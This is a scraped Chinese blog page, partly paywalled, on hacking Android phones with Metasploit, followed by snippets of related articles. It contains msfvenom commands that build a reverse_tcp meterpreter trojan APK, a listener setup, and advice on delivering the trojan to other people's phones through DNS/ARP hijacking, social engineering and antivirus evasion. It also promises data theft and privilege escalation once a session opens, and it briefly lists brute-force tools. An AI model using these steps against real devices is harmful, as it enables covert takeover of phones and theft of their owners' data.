MSF入侵安卓手机【附源码笔记】

最新推荐文章于 2025-04-22 14:38:29 发布
最新推荐文章于 2025-04-22 14:38:29 发布
阅读量1.2k 收藏 17
点赞数 9
文章标签: 计算机 编程 MSF 网络安全 黑客 自学黑客 IT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_77162959/article/details/138794438
版权

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。

环境:Backbox linux+MSF

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP 

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径

最低0.47元/天 解锁文章
利用MSF攻击Android
qq_45746768的博客
07-08 4114
利用Metasploit攻击Android
MSF入侵安卓手机
2301_77162959的博客
07-11 1632
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透)
最新发布
wholeliubei的博客
04-22 1136
MSF,全称为,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 2万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1865
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
暴力破解攻击工具汇总——字典很关键,肉鸡也关键
weixin_30296405的博客
03-30 5256
lasercrack是一款爆力破解工具,ruby写的,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率。 破解RDP的软件也有很多,比如ncrack和Fast RDP Brute。 如果网页没有设置登录验证码,则很可能成为暴力破解工具攻击的目标,http://www.freebuf.com/column/169124.html,Nodejs暴力破解实践 web 登...
典型的多层神经网络模型,神经网络多传感器融合
wenangou的博客
10-07 3321
两者间不具有明显的关系,前者是一类需要解决的问题,即将处于不同层次或相同层次的传感器信息进行全局性或局部性的融合。(加权平均就是一种最简单的融合)。 神经网络(NN)是人工智能算法中的一种方法,其可以用于解决诸如多传感器信息融合这样的一类问题,其应用领域多种多样。 总而言之,两者间非必须的一种组合,但是两者相结合也是一种处理问题的方法。 RBF(radial basis functions)径向基网络也只是神经网络的一种类型,其是前馈型网络的一种。谷歌人工智能写作项目:小发猫近20 年来,人们提出了多种信息
网络安全专业名词解释
aixmmmlll的博客
05-16 4415
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
自学黑客网络安全
dexi1113的博客
06-20 847
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
MSF渗透Android
Yxisobai的博客
05-28 1620
kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。
MSF渗透安卓手机(George的第一次黑客渗透)
2402_86265887的博客
01-27 2374
刚进行过黑客渗透的 George 激情澎湃,决定写一篇 优快云 记录一下,谨以纪念!MSF,全称为,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。
Msf 入侵安卓手机
weixin_30378311的博客
09-21 1307
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2940
使用msfvenom生成木马控制手机
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 9275
Kali Linux使用MSF木马入侵安卓手机
msf渗透安卓
weixin_30872499的博客
05-29 637
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
MSF - Android
ShenMian000
10-05 929
更新中 Step 1 生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<监听Port> R -o backdoor.apk 当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。 Step 2 开启监听任务 msf > use use exp...
MSF渗透测试android手机
永远是少年
06-15 5342
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
Msfvenom控制手机
2301_77315080的博客
09-27 441
3监听利用msfconsole监听模块。Msfvenom的使用(kali操作)后置摄像头拍照(1是后置,2是前置)设置主机(云服务器)设置主机(云服务器)
Kali利用MSF渗透安卓手机
03-13
### 使用 Kali Linux 和 Metasploit Framework 对 Android 设备进行渗透测试 #### 准备工作 为了确保环境配置正确,在开始之前需更新和升级 Kali Linux 的包管理器以及安装最新版本的 Metasploit Framework[^1]。 ```bash apt update && apt upgrade -y apt install metasploit-framework -y ``` #### 启动 Metasploit Framework 通过 `msfconsole` 命令可以启动 Metasploit Framework 并进入其交互式命令行界面。这一步骤对于后续操作至关重要,因为所有的渗透测试活动都将在此环境中执行[^2]。 ```bash msfconsole ``` #### 配置监听模块 针对 Android 设备的渗透测试通常涉及使用特定的有效载荷(payload)。下面是一个常见的有效载荷设置过程: - **选择多平台反向 TCP Shell** ```ruby use exploit/multi/handler set payload android/meterpreter/reverse_tcp ``` - **设定 LHOST 参数** 这里需要指定本地 IP 地址作为回调地址,即攻击者机器上的 IP 地址。 ```ruby set LHOST <Your_Kali_IP_Address> ``` - **设定 LPORT 参数** 设置用于接收连接请求的端口号,默认情况下可以选择 4444 或其他未被占用的端口。 ```ruby set LPORT 4444 ``` - **开启监听** 执行此指令后,Metasploit 将等待来自目标设备的连接尝试。 ```ruby exploit -j -z ``` #### 创建恶意 APK 文件 为了让 Android 用户下载并运行含有恶意代码的应用程序,可利用 msfvenom 工具生成带有自定义图标和名称的 APK 文件。 ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your_Kali_IP_Address> LPORT=4444 R > malicious.apk ``` #### 社会工程学手段传播恶意应用 将生成好的 APK 发送给潜在受害者或者上传到不受信任的应用商店让对方自行下载安装。请注意这种行为仅限于合法授权范围内的安全评估活动中。 #### 获取 Meterpreter Session 一旦受害者的手机成功安装并打开了该应用程序,则会在 Metasploit 控制台中看到一个新的 session 被创建出来。此时便可以获得对受感染系统的完全控制权限。 ```ruby sessions -i <Session_ID> ``` #### 实施进一步行动 有了 meterpreter shell 访问权之后就可以开展更多深入调查动作比如提取敏感数据、提权等高级技巧。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值